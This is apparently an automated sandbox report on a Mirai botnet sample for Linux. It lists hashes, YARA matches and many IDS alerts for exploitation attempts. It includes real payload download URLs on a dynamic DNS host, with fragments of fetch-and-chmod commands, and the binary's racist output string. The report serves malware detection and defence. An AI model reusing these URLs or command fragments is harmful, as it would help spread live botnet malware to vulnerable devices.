Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
fMB6uAXjd0.elf

Overview

General Information

Sample Name:fMB6uAXjd0.elf
Analysis ID:728568
MD5:e8a738a14a114c60324a7cbfb61730bd
SHA1:f152928b44a9025929b905e8d2e5c7b258d6b98e
SHA256:fb178c4ffa1bd9d6b872187f35a1b4330e58dc83bff5b633bd1e4ff0c114c2d0
Tags:32elfmiraisparc
Infos:

Detection

Mirai
Score:96
Range:0 - 100
Whitelisted:false

Signatures

Yara detected Mirai
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Snort IDS alert for network traffic
Uses known network protocols on non-standard ports
Uses dynamic DNS services
Yara signature match
Uses the "uname" system call to query kernel version information (possible evasion)
Enumerates processes within the "proc" file system
Detected TCP or UDP traffic on non-standard ports
Sample listens on a socket
Sample contains strings that are potentially command strings
Sample has stripped symbol table
HTTP GET or POST without a user agent
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable

Classification

Analysis Advice

Some HTTP requests failed (404). It is likely that the sample will exhibit less behavior.
Static ELF header machine description suggests that the sample might not execute correctly on this machine.
Joe Sandbox Version:36.0.0 Rainbow Opal
Analysis ID:728568
Start date and time:2022-10-23 17:55:49 +02:00
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 5m 36s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:fMB6uAXjd0.elf
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Detection:MAL
Classification:mal96.troj.linELF@0/0@2/0
  • Report size exceeded maximum capacity and may have missing network information.
  • VT rate limit hit for: http://127.0.0.1/cgi-bin/ViewLog.asp
  • VT rate limit hit for: http://127.0.0.1:52869/wanipcn.xml
  • VT rate limit hit for: http://amkbins.duckdns.org/bins/ascaris.arm7;
  • VT rate limit hit for: http://amkbins.duckdns.org/bins/ascaris.arm7;chmod
  • VT rate limit hit for: http://amkbins.duckdns.org/bins/ascaris.mips
  • VT rate limit hit for: http://amkbins.duckdns.org/bins/ascaris.mips%20-O%20-
  • VT rate limit hit for: http://amkbins.duckdns.org/bins/ascaris.x86
Command:/tmp/fMB6uAXjd0.elf
PID:6235
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
gosh that chinese family at the other table sure ate a lot
Standard Error:
  • system is lnxubuntu20
  • cleanup
SourceRuleDescriptionAuthorStrings
fMB6uAXjd0.elfMirai_Botnet_MalwareDetects Mirai Botnet MalwareFlorian Roth
  • 0x139d0:$x2: /dev/misc/watchdog
  • 0x139c0:$x3: /dev/watchdog
  • 0x14b90:$s5: HWCLVGAJ
fMB6uAXjd0.elfJoeSecurity_Mirai_8Yara detected MiraiJoe Security
    fMB6uAXjd0.elfJoeSecurity_Mirai_9Yara detected MiraiJoe Security
      fMB6uAXjd0.elfLinux_Trojan_Mirai_0bce98a2unknownunknown
      • 0x14b84:$a: 4B 52 41 00 46 47 44 43 57 4E 56 00 48 57 43 4C 56 47 41 4A
      SourceRuleDescriptionAuthorStrings
      dump.pcapJoeSecurity_Mirai_12Yara detected MiraiJoe Security
        SourceRuleDescriptionAuthorStrings
        6235.1.00007ff2b0011000.00007ff2b0027000.r-x.sdmpMirai_Botnet_MalwareDetects Mirai Botnet MalwareFlorian Roth
        • 0x139d0:$x2: /dev/misc/watchdog
        • 0x139c0:$x3: /dev/watchdog
        • 0x14b90:$s5: HWCLVGAJ
        6235.1.00007ff2b0011000.00007ff2b0027000.r-x.sdmpJoeSecurity_Mirai_8Yara detected MiraiJoe Security
          6235.1.00007ff2b0011000.00007ff2b0027000.r-x.sdmpJoeSecurity_Mirai_9Yara detected MiraiJoe Security
            6235.1.00007ff2b0011000.00007ff2b0027000.r-x.sdmpLinux_Trojan_Mirai_0bce98a2unknownunknown
            • 0x14b84:$a: 4B 52 41 00 46 47 44 43 57 4E 56 00 48 57 43 4C 56 47 41 4A
            Timestamp:192.168.2.2383.169.5.15443118802846380 10/23/22-17:57:01.341530
            SID:2846380
            Source Port:43118
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23195.77.239.10450098802846457 10/23/22-17:58:21.709517
            SID:2846457
            Source Port:50098
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23188.66.75.17447020802846457 10/23/22-17:58:07.972266
            SID:2846457
            Source Port:47020
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2388.221.153.18655382802027121 10/23/22-17:57:13.448584
            SID:2027121
            Source Port:55382
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2393.188.246.18639222802841623 10/23/22-17:56:53.628982
            SID:2841623
            Source Port:39222
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2389.210.138.12548964802846457 10/23/22-17:58:10.349893
            SID:2846457
            Source Port:48964
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23178.62.200.14141160802846380 10/23/22-17:58:27.467122
            SID:2846380
            Source Port:41160
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2382.157.21.19744928802846380 10/23/22-17:57:55.462907
            SID:2846380
            Source Port:44928
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2386.120.194.18837138802846380 10/23/22-17:58:19.944979
            SID:2846380
            Source Port:37138
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2395.79.48.17445426802027121 10/23/22-17:57:36.434806
            SID:2027121
            Source Port:45426
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2346.29.250.14645486802846457 10/23/22-17:57:53.195768
            SID:2846457
            Source Port:45486
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2395.163.80.19756796802027121 10/23/22-17:56:55.629477
            SID:2027121
            Source Port:56796
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2389.22.112.18335916802846457 10/23/22-17:57:55.908028
            SID:2846457
            Source Port:35916
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2383.1.194.4741534802846380 10/23/22-17:58:31.017754
            SID:2846380
            Source Port:41534
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2388.99.138.11735390802027121 10/23/22-17:56:51.035586
            SID:2027121
            Source Port:35390
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2352.40.241.15145210802841623 10/23/22-17:57:20.230013
            SID:2841623
            Source Port:45210
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23213.16.50.17051602802846380 10/23/22-17:56:58.195822
            SID:2846380
            Source Port:51602
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23213.238.59.18058408802846380 10/23/22-17:57:54.109941
            SID:2846380
            Source Port:58408
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23178.115.247.1737470802846380 10/23/22-17:57:27.993436
            SID:2846380
            Source Port:37470
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2395.68.25.3137366802027121 10/23/22-17:58:15.253758
            SID:2027121
            Source Port:37366
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.23112.48.187.1541664802027121 10/23/22-17:58:25.717935
            SID:2027121
            Source Port:41664
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.23104.173.4.1365681275472023548 10/23/22-17:57:55.431713
            SID:2023548
            Source Port:56812
            Destination Port:7547
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.238.219.182.6137142802835222 10/23/22-17:58:09.988784
            SID:2835222
            Source Port:37142
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2395.168.211.6555322802027121 10/23/22-17:57:43.876716
            SID:2027121
            Source Port:55322
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.23213.176.44.8249726802846380 10/23/22-17:57:37.999015
            SID:2846380
            Source Port:49726
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2395.100.239.12337604802027121 10/23/22-17:57:34.527124
            SID:2027121
            Source Port:37604
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.23206.249.235.6154176802846380 10/23/22-17:57:29.944319
            SID:2846380
            Source Port:54176
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2385.128.243.14737520802846457 10/23/22-17:58:01.351031
            SID:2846457
            Source Port:37520
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2395.156.238.959532802027121 10/23/22-17:57:10.578364
            SID:2027121
            Source Port:59532
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2384.137.62.24135770802846457 10/23/22-17:57:18.368357
            SID:2846457
            Source Port:35770
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23195.9.94.19850198802846457 10/23/22-17:58:21.697652
            SID:2846457
            Source Port:50198
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2395.217.48.16641132802027121 10/23/22-17:58:27.445125
            SID:2027121
            Source Port:41132
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2388.249.124.14641718802027121 10/23/22-17:57:05.166994
            SID:2027121
            Source Port:41718
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2337.109.51.1952366802846457 10/23/22-17:56:51.879347
            SID:2846457
            Source Port:52366
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23200.94.112.9738864802846380 10/23/22-17:58:17.610079
            SID:2846380
            Source Port:38864
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23122.254.97.7133850528692027339 10/23/22-17:58:20.061747
            SID:2027339
            Source Port:33850
            Destination Port:52869
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2384.86.92.6547494802846457 10/23/22-17:57:56.399097
            SID:2846457
            Source Port:47494
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2388.221.76.11652184802027121 10/23/22-17:56:55.629611
            SID:2027121
            Source Port:52184
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2388.221.68.24436880802027121 10/23/22-17:58:09.637346
            SID:2027121
            Source Port:36880
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.232.18.235.2359882802846457 10/23/22-17:57:28.754342
            SID:2846457
            Source Port:59882
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23188.128.164.13538398802846457 10/23/22-17:58:07.920925
            SID:2846457
            Source Port:38398
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23112.48.187.1541692802027121 10/23/22-17:58:25.936044
            SID:2027121
            Source Port:41692
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2389.32.148.7040040802846457 10/23/22-17:57:38.011306
            SID:2846457
            Source Port:40040
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2337.211.17.20059408802846457 10/23/22-17:57:29.018473
            SID:2846457
            Source Port:59408
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2382.223.227.3937670802846380 10/23/22-17:57:07.329740
            SID:2846380
            Source Port:37670
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2384.7.151.1646206528692027339 10/23/22-17:57:20.270827
            SID:2027339
            Source Port:46206
            Destination Port:52869
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2395.188.129.15556402802027121 10/23/22-17:57:21.135322
            SID:2027121
            Source Port:56402
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.23202.90.153.22354594802841623 10/23/22-17:58:14.263264
            SID:2841623
            Source Port:54594
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23171.238.97.3759214802846457 10/23/22-17:57:59.974478
            SID:2846457
            Source Port:59214
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2395.101.162.9437358802027121 10/23/22-17:58:27.488384
            SID:2027121
            Source Port:37358
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.23162.83.143.18849864802841623 10/23/22-17:57:20.378520
            SID:2841623
            Source Port:49864
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23178.62.89.16655268802846380 10/23/22-17:58:27.260602
            SID:2846380
            Source Port:55268
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2382.153.27.20945256802846380 10/23/22-17:58:04.029491
            SID:2846380
            Source Port:45256
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2388.221.47.15358532802027121 10/23/22-17:57:18.680205
            SID:2027121
            Source Port:58532
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.23213.159.7.240422802846380 10/23/22-17:56:58.194033
            SID:2846380
            Source Port:40422
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2385.128.198.10960226802846457 10/23/22-17:58:01.351204
            SID:2846457
            Source Port:60226
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2389.207.18.18044328528692027339 10/23/22-17:57:44.641165
            SID:2027339
            Source Port:44328
            Destination Port:52869
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2377.163.130.22032968802835222 10/23/22-17:57:04.036152
            SID:2835222
            Source Port:32968
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.23213.168.162.15245228802846380 10/23/22-17:57:48.525193
            SID:2846380
            Source Port:45228
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2395.217.208.24347200802027121 10/23/22-17:57:13.009624
            SID:2027121
            Source Port:47200
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2395.101.158.22234014802027121 10/23/22-17:58:15.265646
            SID:2027121
            Source Port:34014
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2361.241.147.22837886802846457 10/23/22-17:57:51.681033
            SID:2846457
            Source Port:37886
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2354.217.124.4532912802835221 10/23/22-17:58:21.159984
            SID:2835221
            Source Port:32912
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2337.72.203.3554416528692027339 10/23/22-17:58:30.504592
            SID:2027339
            Source Port:54416
            Destination Port:52869
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2388.250.162.18057872802027121 10/23/22-17:57:21.371554
            SID:2027121
            Source Port:57872
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.23178.33.108.12760484802846380 10/23/22-17:58:13.489022
            SID:2846380
            Source Port:60484
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2395.175.97.5146688802027121 10/23/22-17:57:34.533379
            SID:2027121
            Source Port:46688
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.23164.70.13.6947254802846457 10/23/22-17:57:55.976971
            SID:2846457
            Source Port:47254
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23188.40.218.12641988802846457 10/23/22-17:58:07.896485
            SID:2846457
            Source Port:41988
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2388.203.186.17933278802027121 10/23/22-17:58:10.598501
            SID:2027121
            Source Port:33278
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2395.216.76.15342048802027121 10/23/22-17:58:24.028327
            SID:2027121
            Source Port:42048
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2372.34.52.1655066802841623 10/23/22-17:56:49.234026
            SID:2841623
            Source Port:55066
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2385.235.62.23945792802846457 10/23/22-17:57:58.585748
            SID:2846457
            Source Port:45792
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.235.35.226.7539522802846457 10/23/22-17:57:08.374548
            SID:2846457
            Source Port:39522
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23149.96.34.12645698802841623 10/23/22-17:57:38.794574
            SID:2841623
            Source Port:45698
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23188.68.47.12635108802846457 10/23/22-17:58:17.658160
            SID:2846457
            Source Port:35108
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23112.221.131.23353588802027121 10/23/22-17:57:28.559296
            SID:2027121
            Source Port:53588
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2380.147.77.6857926802846457 10/23/22-17:56:52.718808
            SID:2846457
            Source Port:57926
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2380.32.107.3547024802846380 10/23/22-17:58:39.164334
            SID:2846380
            Source Port:47024
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23206.51.235.12354264802846380 10/23/22-17:57:29.458919
            SID:2846380
            Source Port:54264
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2388.221.218.5943938802027121 10/23/22-17:57:38.609285
            SID:2027121
            Source Port:43938
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2395.160.28.4750678802027121 10/23/22-17:57:49.805107
            SID:2027121
            Source Port:50678
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2388.19.134.10941042802027121 10/23/22-17:58:02.124782
            SID:2027121
            Source Port:41042
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.23200.84.15.11857298802841623 10/23/22-17:57:38.963880
            SID:2841623
            Source Port:57298
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2346.137.174.23059784802846457 10/23/22-17:58:05.463276
            SID:2846457
            Source Port:59784
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23112.124.15.20654442802027121 10/23/22-17:57:06.686727
            SID:2027121
            Source Port:54442
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.23213.150.218.4533260802846380 10/23/22-17:58:33.498606
            SID:2846380
            Source Port:33260
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23171.245.102.22355776528692027339 10/23/22-17:57:24.764501
            SID:2027339
            Source Port:55776
            Destination Port:52869
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.23171.245.102.22355778528692027339 10/23/22-17:57:25.068090
            SID:2027339
            Source Port:55778
            Destination Port:52869
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2395.179.158.25459052802027121 10/23/22-17:57:34.506424
            SID:2027121
            Source Port:59052
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2389.207.18.18044326528692027339 10/23/22-17:57:44.623923
            SID:2027339
            Source Port:44326
            Destination Port:52869
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.23213.176.39.22639328802846380 10/23/22-17:56:47.130746
            SID:2846380
            Source Port:39328
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2395.100.176.5534038802027121 10/23/22-17:57:23.530626
            SID:2027121
            Source Port:34038
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.23112.50.105.2350420802027121 10/23/22-17:57:34.483562
            SID:2027121
            Source Port:50420
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.23123.200.139.11556904802841623 10/23/22-17:58:14.941149
            SID:2841623
            Source Port:56904
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2395.179.201.5743146802027121 10/23/22-17:57:12.977664
            SID:2027121
            Source Port:43146
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.23186.211.177.1947854802841623 10/23/22-17:58:37.852912
            SID:2841623
            Source Port:47854
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.235.189.103.9338736802846457 10/23/22-17:56:55.153771
            SID:2846457
            Source Port:38736
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2384.33.211.2247624802846457 10/23/22-17:57:18.332948
            SID:2846457
            Source Port:47624
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23122.236.227.17438626528692027339 10/23/22-17:58:14.560497
            SID:2027339
            Source Port:38626
            Destination Port:52869
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2346.149.136.8253522802846457 10/23/22-17:58:24.203876
            SID:2846457
            Source Port:53522
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23181.214.43.23638530802846380 10/23/22-17:58:17.412817
            SID:2846380
            Source Port:38530
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23200.88.174.14153992802846380 10/23/22-17:57:30.680768
            SID:2846380
            Source Port:53992
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23104.111.37.23347442802841623 10/23/22-17:57:12.707942
            SID:2841623
            Source Port:47442
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2345.195.13.8751334372152835222 10/23/22-17:57:51.987216
            SID:2835222
            Source Port:51334
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.23112.213.124.21438934802027121 10/23/22-17:58:25.434539
            SID:2027121
            Source Port:38934
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2388.123.26.19642432802027121 10/23/22-17:57:56.401490
            SID:2027121
            Source Port:42432
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2385.204.125.1342798802846457 10/23/22-17:57:31.246149
            SID:2846457
            Source Port:42798
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2395.86.88.5645308802027121 10/23/22-17:57:36.438934
            SID:2027121
            Source Port:45308
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2384.6.148.3449252372152835222 10/23/22-17:58:21.931096
            SID:2835222
            Source Port:49252
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.23206.249.241.10854290802846380 10/23/22-17:57:55.604498
            SID:2846380
            Source Port:54290
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2388.80.170.4334972802027121 10/23/22-17:56:53.231278
            SID:2027121
            Source Port:34972
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.23206.189.43.11348598802846380 10/23/22-17:57:40.722817
            SID:2846380
            Source Port:48598
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23200.61.47.20360798802846380 10/23/22-17:57:15.792879
            SID:2846380
            Source Port:60798
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2380.254.172.25035230802846380 10/23/22-17:57:51.839646
            SID:2846380
            Source Port:35230
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2388.214.226.17042140802027121 10/23/22-17:58:09.830555
            SID:2027121
            Source Port:42140
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2380.30.56.4234240802846380 10/23/22-17:57:11.436345
            SID:2846380
            Source Port:34240
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2386.106.184.13752658802846380 10/23/22-17:57:07.241745
            SID:2846380
            Source Port:52658
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23112.167.187.22938242802027121 10/23/22-17:56:58.388006
            SID:2027121
            Source Port:38242
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.23181.31.102.22742032802835221 10/23/22-17:57:28.350931
            SID:2835221
            Source Port:42032
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2389.133.92.21345654802846457 10/23/22-17:57:07.102618
            SID:2846457
            Source Port:45654
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2380.133.216.19254798802846457 10/23/22-17:57:09.746440
            SID:2846457
            Source Port:54798
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2368.183.20.5556204802835221 10/23/22-17:57:16.524200
            SID:2835221
            Source Port:56204
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2346.47.178.14036312802846457 10/23/22-17:58:23.968200
            SID:2846457
            Source Port:36312
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2389.17.195.15235104802846457 10/23/22-17:56:45.537309
            SID:2846457
            Source Port:35104
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2354.186.196.19739546802835222 10/23/22-17:58:21.330242
            SID:2835222
            Source Port:39546
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2384.63.236.20137248802846457 10/23/22-17:58:15.349097
            SID:2846457
            Source Port:37248
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2386.178.155.20843434802846380 10/23/22-17:56:52.007644
            SID:2846380
            Source Port:43434
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23206.189.61.24160302802846380 10/23/22-17:57:27.985364
            SID:2846380
            Source Port:60302
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23206.189.255.20040508802846380 10/23/22-17:57:29.190289
            SID:2846380
            Source Port:40508
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23178.128.51.5742052802846380 10/23/22-17:57:49.583215
            SID:2846380
            Source Port:42052
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2346.242.216.640752802846457 10/23/22-17:58:15.375651
            SID:2846457
            Source Port:40752
            Destination Port:80
            Protocol:TCP
